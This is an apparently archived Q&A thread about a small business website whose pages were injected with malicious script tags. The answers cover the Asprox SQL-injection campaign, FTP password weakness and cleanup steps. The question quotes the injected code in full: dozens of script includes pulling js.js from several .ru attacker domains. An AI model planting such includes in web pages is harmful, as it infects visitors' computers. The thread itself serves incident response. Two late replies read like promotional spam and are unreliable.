views:

1322

answers:

11

My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.

I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

So I commented it out for now. It turns out his ftp password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).

I did a whois on 98hs.ru and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...

I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?

He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to do sftp on their site. I'm thinking his username and password got intercepted?

So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?

For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):

<!--script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script--&gt;
+3  A: 

With a six word character password, he may have been brute forced. That is more likely than his ftp being intercepted, but it could be that too.

Start with a stronger password. (8 characters is still fairly weak)

See if this link to an internet security blog is helpful.

Justin Standard
+13  A: 

Try and gather as much information as you can. See if the host can give you a log showing all the FTP connections that were made to your account. You can use those to see if it was even an FTP connection that was used to make the change and possibly get an IP address.

If you're using a prepacked software like Wordpress, Drupal, or anything else that you didn't code there may be vulnerabilities in upload code that allows for this sort of modification. If it is custom built, double check any places where you allow users to upload files or modify existing files.

The second thing would be to take a dump of the site as-is and check everything for other modifications. It may just be one single modification they made, but if they got in via FTP who knows what else is up there.

Revert your site back to a known good status and, if need be, upgrade to the latest version.

There is a level of return you have to take into account too. Is the damage worth trying to track the person down or is this something where you just live and learn and use stronger passwords?

dragonmantank
+2  A: 

Is the site just plain static HTML? i.e. he hasn't managed to code himself an upload page that permits anyone driving by to upload compromised scripts/pages?

Why not ask webhost4life if they have any FTP logs available and report the issue to them. You never know, they may be quite receptive and find out for you exactly what happened?

I work for a shared hoster and we always welcome reports such as these and can usually pinpoint the exact vector of attack based and advise as to where the customer went wrong.

Kev
+5  A: 

You mention your Dad was using a website publishing tool.

If the publishing tool publishes from his computer to the server, it may be the case that his local files are clean, and that he just needs to republish to the server.

He should see if there's a different login method to his server than plain FTP, though... that's not very secure because it sends his password as clear-text over the internet.

Mark Harrison
+14  A: 

I know this is a little late in the game, but the URL mentioned for the JavaScript is mentioned in a list of sites known to have been part of the ASPRox bot resurgence that started up in June (at least that's when we were getting flagged with it). Some details about it are mentioned below:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

The nasty thing about this is that effectively every varchar type field in the database is "infected" to spit out a reference to this URL, in which the the browser gets an tiny iframe that turns it into a bot. A basic SQL fix for this can be found here:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

The scary thing though is that the virus looks to the system tables for values to infect and a lot of shared hosting plans also share the database space for their clients. So most likely it wasn't even your dad's site that was infected, but somebody else's site within his hosting cluster that wrote some poor code and opened the door to SQL Injection attack.

If he hasn't done so yet, I'd send an URGENT e-mail to their host and give them a link to that SQL code to fix the entire system. You can fix your own affected database tables, but most likely the bots that are doing the infection are going to pass right through that hole again and infect the whole lot.

Hopefully this gives you some more info to work with.

EDIT: One more quick thought, if he's using one of the hosts online design tools for building his website, all of that content is probably sitting in a column and was infected that way.

Dillie-O
A: 

We had been hacked from same guys apparently! Or bots, in our case. They used SQL injection in URL on some old classic ASP sites that nobody maintain anymore. We found attacking IPs and blocked them in IIS. Now we must refactor all old ASP. So, my advice is to take a look at IIS logs first, to find if problem is in your site's code or server configuration.

Hrvoje
A: 

Unplug the webserver without shutting it down to avoid shutdown scripts. Analyze the hard disk through another computer as a data drive and see if you can determine the culprit through log files and things of that nature. Verify that the code is safe and then restore it from a backup.

Joe Philllips
A: 

This happened to a client of mine recently that was hosted on ipower. I'm not sure if your hosting environment was Apache based, but if it was be sure to double check for .htaccess files that you did not create, particularly above the webroot and inside of image directories, as they tend to inject some nastiness there as well (they were redirecting people depending on where they came from in the refer). Also check any that you did create for code that you did not write.

The Brawny Man
A: 

I have written a server side code removal tool in ASP.Net Here. Hope this will help you save your time to clean the hosted files :) This is much faster than cleaning the files via FTP or your control panel.

Faiz
A: 

Hi, My father in-law got his site hacked as well. He got in touch with a security company called Serios Networks. They fixed it up and there are no more problems with his site! Their site is seriosnetworks.com The guy that helped us out is named Adam. Is number is 269-202-4003 give them a try they worked for us.

A: 

We had these types of issues with our clients for years. It is a unavoidable issue every website is under treat

We use http://www.websafe.ie/ for all our clients before handing over site ownership. But little late for preventive measure now mate.

clear up the mess and start free with a little more security this time. good luck

James Snipes